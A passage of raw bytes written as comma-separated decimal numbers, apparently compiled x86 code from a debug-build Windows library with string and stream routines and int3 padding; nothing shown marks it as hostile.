104,120,184,1,16,100,161,0,0,0,0,80,129,236,204,0,0,0,83,86,87,81,141,189,40,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,139,69,8,80,139,77,236,232,201,178,255,255,199,69,252,0,0,0,0,139,69,8,139,8,139,85,8,3,81,4,139,244,139,202,255,21,108,52,2,16,59,244,232,57,177,255,255,15,182,192,133,192,116,77,139,69,8,139,8,139,85,8,3,81,4,139,244,139,202,255,21,104,52,2,16,59,244,232,22,177,255,255,133,192,116,45,139,69,8,139,8,139,85,8,3,81,4,139,244,139,202,255,21,104,52,2,16,59,244,232,246,176,255,255,139,244,139,200,255,21,100,52,2,16,59,244,232,229,176,255,255,139,69,8,139,8,139,85,8,3,81,4,139,244,139,202,255,21,108,52,2,16,59,244,232,201,176,255,255,139,77,236,136,65,4,199,69,252,255,255,255,255,139,69,236,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,216,0,0,0,59,236,232,158,176,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,168,184,1,16,100,161,0,0,0,0,80,129,236,204,0,0,0,83,86,87,81,141,189,40,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,199,69,252,0,0,0,0,139,244,255,21,116,52,2,16,59,244,232,242,175,255,255,15,182,192,133,192,117,20,139,244,139,69,236,139,8,255,21,112,52,2,16,59,244,232,215,175,255,255,199,69,252,255,255,255,255,139,77,236,232,40,175,255,255,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,216,0,0,0,59,236,232,173,175,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,15,182,64,4,247,216,27,192,247,216,131,232,1,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,216,0,0,0,83,86,87,81,141,189,40,255,255,255,185,54,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,139,13,224,250,1,16,43,72,20,59,77,8,119,8,139,77,248,232,20,172,255,255,131,125,8,0,118,69,139,69,248,139,72,20,3,77,8,137,77,236,106,0,139,85,236,82,139,77,248,232,122,173,255,255,15,182,192,133,192,116,36,15,182,69,12,80,139,77,8,81,139,85,248,139,66,20,80,139,77,248,232,154,170,255,255,139,69,236,80,139,77,248,232,8,174,255,255,139,69,248,95,94,91,129,196,216,0,0,0,59,236,232,144,174,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,8,59,5,224,250,1,16,117,8,139,77,248,232,74,171,255,255,106,0,139,69,8,80,139,77,248,232,194,172,255,255,15,182,200,133,201,116,31,15,182,69,12,80,139,77,8,81,106,0,139,77,248,232,231,169,255,255,139,69,8,80,139,77,248,232,85,173,255,255,139,69,248,95,94,91,129,196,204,0,0,0,59,236,232,221,173,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,216,0,0,0,83,86,87,81,141,189,40,255,255,255,185,54,0,0,0,184,204,204,204,204,243,171,89,137,77,248,198,133,47,255,255,255,0,139,69,248,139,77,8,137,72,20,141,149,47,255,255,255,82,139,77,248,232,101,171,255,255,3,69,8,80,232,208,170,255,255,131,196,8,95,94,91,129,196,216,0,0,0,59,236,232,76,173,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,69,8,139,77,12,138,17,136,16,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,95,94,91,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,8,80,232,254,169,255,255,131,196,4,95,94,91,129,196,204,0,0,0,59,236,232,107,172,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,208,0,0,0,83,86,87,81,141,189,48,255,255,255,185,52,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,139,77,8,137,8,139,69,248,139,8,139,17,139,69,248,139,8,3,74,4,139,244,255,21,40,52,2,16,59,244,232,1,172,255,255,133,192,116,64,139,69,248,139,8,139,17,139,69,248,139,8,3,74,4,139,244,255,21,40,52,2,16,59,244,232,223,171,255,255,137,133,48,255,255,255,139,141,48,255,255,255,139,17,139,244,139,141,48,255,255,255,139,66,4,255,208,59,244,232,189,171,255,255,139,69,248,95,94,91,129,196,208,0,0,0,59,236,232,170,171,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,208,0,0,0,83,86,87,81,141,189,48,255,255,255,185,52,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,139,8,139,17,139,69,248,139,8,3,74,4,139,244,255,21,40,52,2,16,59,244,232,57,171,255,255,133,192,116,64,139,69,248,139,8,139,17,139,69,248,139,8,3,74,4,139,244,255,21,40,52,2,16,59,244,232,23,171,255,255,137,133,48,255,255,255,139,141,48,255,255,255,139,17,139,244,139,141,48,255,255,255,139,66,8,255,208,59,244,232,245,170,255,255,95,94,91,129,196,208,0,0,0,59,236,232,229,170,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,8,80,232,14,168,255,255,131,196,4,95,94,91,129,196,204,0,0,0,59,236,232,123,170,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,106,0,139,69,8,80,232,75,169,255,255,131,196,8,95,94,91,129,196,204,0,0,0,59,236,232,25,170,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,131,125,12,1,117,26,141,69,16,80,139,77,248,232,194,167,255,255,3,69,8,80,232,45,167,255,255,131,196,8,235,29,15,182,69,16,80,139,77,12,81,139,77,248,232,163,167,255,255,3,69,8,80,232,30,166,255,255,131,196,12,95,94,91,129,196,204,0,0,0,59,236,232,138,169,255,255,139,229,93,194,12,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,69,12,80,15,190,77,16,81,139,85,8,82,232,125,166,255,255,131,196,12,95,94,91,129,196,192,0,0,0,59,236,232,23,169,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,208,0,0,0,83,86,87,81,141,189,48,255,255,255,185,52,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,232,21,169,255,255,59,69,8,115,8,139,77,248,232,232,165,255,255,139,69,248,139,72,24,59,77,8,115,21,139,69,248,139,72,20,81,139,85,8,82,139,77,248,232,57,165,255,255,235,83,15,182,69,12,133,192,116,59,131,125,8,16,115,53,139,69,248,139,77,8,59,72,20,115,11,139,85,8,137,149,48,255,255,255,235,12,139,69,248,139,72,20,137,141,48,255,255,255,139,149,48,255,255,255,82,106,1,139,77,248,232,122,168,255,255,235,16,131,125,8,0,117,10,106,0,139,77,248,232,180,167,255,255,51,192,59,69,8,27,192,247,216,95,94,91,129,196,208,0,0,0,59,236,232,54,168,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,208,0,0,0,83,86,87,81,141,189,48,255,255,255,185,52,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,131,120,24,16,114,14,139,77,248,139,81,4,137,149,48,255,255,255,235,12,139,69,248,131,192,4,137,133,48,255,255,255,139,133,48,255,255,255,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,244,104,228,250,1,16,255,21,120,52,2,16,59,244,232,83,167,255,255,95,94,91,129,196,204,0,0,0,59,236,232,67,167,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,216,0,0,0,83,86,87,81,141,189,40,255,255,255,185,54,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,139,72,20,59,77,8,115,8,139,77,248,232,165,165,255,255,139,69,248,139,72,20,43,77,8,59,77,12,115,12,139,69,248,139,72,20,43,77,8,137,77,12,131,125,12,0,118,72,139,69,248,139,72,20,43,77,8,43,77,12,81,139,77,248,232,188,164,255,255,3,69,8,3,69,12,80,139,77,248,232,173,164,255,255,3,69,8,80,232,223,165,255,255,131,196,12,139,69,248,139,72,20,43,77,12,137,77,236,139,69,236,80,139,77,248,232,241,165,255,255,139,69,248,95,94,91,129,196,216,0,0,0,59,236,232,121,166,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,244,139,69,16,80,139,77,12,81,139,85,8,82,255,21,192,53,2,16,131,196,12,59,244,232,254,165,255,255,95,94,91,129,196,192,0,0,0,59,236,232,238,165,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,244,104,248,250,1,16,255,21,124,52,2,16,59,244,232,147,165,255,255,95,94,91,129,196,204,0,0,0,59,236,232,131,165,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,220,0,0,0,83,86,87,81,141,189,36,255,255,255,185,55,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,131,193,28,232,240,165,255,255,137,69,236,131,125,236,1,119,12,199,133,36,255,255,255,1,0,0,0,235,12,139,69,236,131,232,1,137,133,36,255,255,255,139,133,36,255,255,255,95,94,91,129,196,220,0,0,0,59,236,232,5,165,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,208,184,1,16,100,161,0,0,0,0,80,81,129,236,232,0,0,0,83,86,87,81,141,189,8,255,255,255,185,58,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,101,240,137,77,232,139,69,8,131,200,15,137,69,220,139,77,232,232,201,164,255,255,59,69,220,115,8,139,69,8,137,69,220,235,82,139,69,220,51,210,185,3,0,0,0,247,241,139,85,232,139,74,24,209,233,59,200,119,2,235,56,139,69,232,139,112,24,209,238,139,77,232,232,146,164,255,255,43,198,139,77,232,57,65,24,119,19,139,69,232,139,72,24,209,233,139,85,232,3,74,24,137,77,220,235,11,139,77,232,232,109,164,255,255,137,69,220,199,69,252,0,0,0,0,139,69,220,131,192,1,80,139,77,232,131,193,28,232,230,160,255,255,137,133,8,255,255,255,139,141,8,255,255,255,137,77,208,235,102,137,101,240,139,69,8,137,69,220,198,69,252,2,139,69,220,131,192,1,80,139,77,232,131,193,28,232,182,160,255,255,137,133,8,255,255,255,139,141,8,255,255,255,137,77,208,235,34,106,0,106,1,139,77,232,232,215,163,255,255,106,0,106,0,232,137,162,255,255,199,69,252,1,0,0,0,184,121,112,1,16,195,199,69,252,1,0,0,0,199,69,252,1,0,0,0,184,141,112,1,16,195,199,69,252,255,255,255,255,131,125,12,0,118,25,139,69,12,80,139,77,232,232,120,161,255,255,80,139,77,208,81,232,9,162,255,255,131,196,12,106,0,106,1,139,77,232,232,123,163,255,255,139,69,232,139,77,208,137,72,4,139,69,232,139,77,220,137,72,24,139,69,12,80,139,77,232,232,169,162,255,255,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,248,0,0,0,59,236,232,41,163,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,106,0,139,69,8,80,232,69,162,255,255,131,196,8,95,94,91,129,196,204,0,0,0,59,236,232,105,162,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,220,0,0,0,83,86,87,81,141,189,36,255,255,255,185,55,0,0,0,184,204,204,204,204,243,171,89,137,77,248,199,69,236,255,255,255,255,131,125,236,0,118,11,139,69,236,137,133,36,255,255,255,235,10,199,133,36,255,255,255,1,0,0,0,139,133,36,255,255,255,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,131,125,8,0,116,45,139,244,106,0,139,69,8,139,16,139,77,8,139,2,255,208,59,244,232,159,161,255,255,139,244,139,69,8,80,255,21,188,53,2,16,131,196,4,59,244,232,137,161,255,255,95,94,91,129,196,192,0,0,0,59,236,232,121,161,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,95,94,91,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,69,16,80,232,74,159,255,255,131,196,4,80,139,77,12,81,139,77,8,232,127,160,255,255,95,94,91,129,196,192,0,0,0,59,236,232,211,160,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,69,12,80,139,77,8,232,25,159,255,255,95,94,91,129,196,192,0,0,0,59,236,232,128,160,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,224,0,0,0,83,86,87,141,189,32,255,255,255,185,56,0,0,0,184,204,204,204,204,243,171,199,69,248,0,0,0,0,131,125,8,0,119,9,199,69,8,0,0,0,0,235,63,129,125,8,255,255,255,31,119,24,139,69,8,193,224,3,80,232,238,160,255,255,131,196,4,137,69,248,131,125,248,0,117,30,106,0,141,141,36,255,255,255,232,122,156,255,255,104,196,25,2,16,141,133,36,255,255,255,80,232,203,158,255,255,139,69,248,95,94,91,129,196,224,0,0,0,59,236,232,228,159,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,244,141,69,8,80,139,77,248,255,21,88,53,2,16,59,244,232,129,159,255,255,139,69,248,199,0,24,251,1,16,139,69,248,95,94,91,129,196,204,0,0,0,59,236,232,101,159,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,199,0,24,251,1,16,139,244,139,77,248,255,21,96,53,2,16,59,244,232,252,158,255,255,95,94,91,129,196,204,0,0,0,59,236,232,236,158,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,232,127,155,255,255,139,69,8,131,224,1,116,12,139,69,248,80,232,14,156,255,255,131,196,4,139,69,248,95,94,91,129,196,204,0,0,0,59,236,232,120,158,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,224,0,0,0,83,86,87,141,189,32,255,255,255,185,56,0,0,0,184,204,204,204,204,243,171,199,69,248,0,0,0,0,131,125,8,0,119,9,199,69,8,0,0,0,0,235,57,131,125,8,255,119,21,139,69,8,80,232,228,158,255,255,131,196,4,137,69,248,131,125,248,0,117,30,106,0,141,141,36,255,255,255,232,112,154,255,255,104,196,25,2,16,141,133,36,255,255,255,80,232,193,156,255,255,139,69,248,95,94,91,129,196,224,0,0,0,59,236,232,218,157,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,244,139,69,8,80,139,77,248,255,21,212,53,2,16,59,244,232,113,157,255,255,139,69,248,199,0,24,251,1,16,139,69,248,95,94,91,129,196,204,0,0,0,59,236,232,85,157,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,20,185,1,16,100,161,0,0,0,0,80,129,236,232,0,0,0,83,86,87,81,141,189,12,255,255,255,185,58,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,139,69,8,80,106,8,232,64,153,255,255,131,196,8,137,133,32,255,255,255,199,69,252,0,0,0,0,131,189,32,255,255,255,0,116,42,139,77,12,81,232,18,155,255,255,131,196,4,139,16,139,64,4,139,141,32,255,255,255,137,17,137,65,4,139,149,32,255,255,255,137,149,12,255,255,255,235,10,199,133,12,255,255,255,0,0,0,0,139,133,12,255,255,255,137,133,20,255,255,255,199,69,252,255,255,255,255,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,244,0,0,0,59,236,232,98,156,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,69,12,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,8,80,232,98,153,255,255,131,196,4,95,94,91,129,196,204,0,0,0,59,236,232,107,155,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,69,8,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,75,185,1,16,100,161,0,0,0,0,80,129,236,128,1,0,0,83,86,87,141,189,116,254,255,255,185,96,0,0,0,184,204,204,204,204,243,171,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,106,1,141,141,72,255,255,255,232,244,154,255,255,199,69,252,0,0,0,0,139,69,12,137,133,116,254,255,255,131,189,116,254,255,255,1,116,2,235,74,139,244,104,160,246,1,16,255,21,36,54,2,16,131,196,4,59,244,232,94,154,255,255,106,64,106,2,104,56,252,1,16,141,141,72,255,255,255,232,150,153,255,255,104,20,252,1,16,141,133,72,255,255,255,80,232,138,153,255,255,131,196,8,141,141,72,255,255,255,232,243,154,255,255,199,133,124,254,255,255,1,0,0,0,199,69,252,255,255,255,255,141,141,72,255,255,255,232,58,151,255,255,139,133,124,254,255,255,82,139,205,80,141,21,68,122,1,16,232,112,151,255,255,88,90,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,140,1,0,0,59,236,232,221,153,255,255,139,229,93,194,12,0,144,1,0,0,0,76,122,1,16,72,255,255,255,168,0,0,0,88,122,1,16,109,121,102,105,108,101,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,255,37,188,52,2,16,255,37,248,52,2,16,255,37,244,52,2,16,255,37,240,52,2,16,255,37,236,52,2,16,255,37,232,52,2,16,255,37,228,52,2,16,255,37,224,52,2,16,255,37,220,52,2,16,255,37,216,52,2,16,255,37,212,52,2,16,255,37,208,52,2,16,255,37,204,52,2,16,255,37,200,52,2,16,255,37,196,52,2,16,255,37,192,52,2,16,255,37,184,52,2,16,255,37,180,52,2,16,255,37,176,52,2,16,255,37,172,52,2,16,255,37,164,52,2,16,255,37,160,52,2,16,255,37,156,52,2,16,255,37,152,52,2,16,255,37,148,52,2,16,255,37,144,52,2,16,255,37,140,52,2,16,255,37,84,52,2,16,255,37,24,52,2,16,255,37,28,52,2,16,255,37,32,52,2,16,255,37,36,52,2,16,255,37,40,52,2,16,255,37,44,52,2,16,255,37,48,52,2,16,255,37,52,52,2,16,255,37,56,52,2,16,255,37,60,52,2,16,255,37,64,52,2,16,255,37,68,52,2,16,255,37,76,52,2,16,204,204,204,204,139,255,85,139,236,106,255,104,153,185,1,16,100,161,0,0,0,0,80,131,236,16,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,255,21,136,52,2,16,137,69,232,106,57,104,100,252,1,16,139,69,232,80,106,8,255,21,132,52,2,16,131,196,16,137,69,236,199,69,252,0,0,0,0,131,125,236,0,116,24,139,77,8,81,139,21,104,35,2,16,82,139,77,236,232,141,148,255,255,137,69,228,235,7,199,69,228,0,0,0,0,139,69,228,137,69,240,199,69,252,255,255,255,255,139,77,240,137,13,104,35,2,16,139,77,244,100,137,13,0,0,0,0,89,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,81,137,77,252,139,69,252,139,77,8,137,8,139,85,252,139,69,12,137,66,4,139,69,252,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,81,137,77,252,232,18,0,0,0,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,106,255,104,217,185,1,16,100,161,0,0,0,0,80,131,236,8,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,106,0,141,77,240,255,21,76,52,2,16,199,69,252,0,0,0,0,131,61,104,35,2,16,0,116,33,161,104,35,2,16,137,69,236,139,77,236,139,17,137,21,104,35,2,16,139,69,236,80,232,172,151,255,255,131,196,4,235,214,199,69,252,255,255,255,255,141,77,240,255,21,56,52,2,16,139,77,244,100,137,13,0,0,0,0,89,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,131,125,8,0,116,23,106,0,139,77,8,232,98,147,255,255,139,69,8,80,255,21,188,53,2,16,131,196,4,93,195,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,81,137,77,252,139,77,252,232,43,148,255,255,139,69,8,131,224,1,116,12,139,77,252,81,232,232,147,255,255,131,196,4,139,69,252,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,81,137,77,252,139,69,252,139,72,4,255,21,80,52,2,16,80,232,193,149,255,255,131,196,4,139,229,93,195,204,204,204,204,204,204,204,204,255,37,80,52,2,16,255,37,252,52,2,16,255,37,88,52,2,16,255,37,92,52,2,16,255,37,96,52,2,16,255,37,100,52,2,16,255,37,104,52,2,16,255,37,108,52,2,16,255,37,112,52,2,16,255,37,116,52,2,16,255,37,120,52,2,16,255,37,124,52,2,16,255,37,128,52,2,16,255,37,132,52,2,16,255,37,136,52,2,16,255,37,36,54,2,16,204,204,204,204,204,204,117,1,195,85,139,236,131,236,0,80,82,83,86,87,139,69,4,106,0,80,232,215,150,255,255,131,196,8,95,94,91,90,88,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,81,83,86,87,51,255,139,242,139,217,137,125,252,57,62,126,72,235,8,141,164,36,0,0,0,0,144,139,70,4,139,12,56,129,124,25,252,204,204,204,204,117,15,139,84,56,4,3,209,129,60,26,204,204,204,204,116,17,139,76,56,8,139,85,4,81,82,232,138,147,255,255,131,196,8,139,69,252,64,131,199,12,137,69,252,59,6,124,194,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,86,139,241,133,246,116,33,133,210,116,29,83,139,93,8,133,219,116,20,87,176,204,139,254,139,202,243,170,139,3,137,70,4,137,86,12,137,51,95,91,94,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,81,83,86,87,139,242,51,255,139,217,59,247,116,82,137,125,252,57,62,126,75,141,155,0,0,0,0,139,70,4,139,12,56,186,204,204,204,204,57,84,25,252,117,11,139,68,56,4,3,193,57,20,24,116,25,139,78,4,139,84,15,8,139,69,4,82,80,232,202,146,255,255,131,196,8,186,204,204,204,204,139,69,252,64,131,199,12,137,69,252,59,6,124,189,235,5,186,204,204,204,204,139,117,8,51,255,139,198,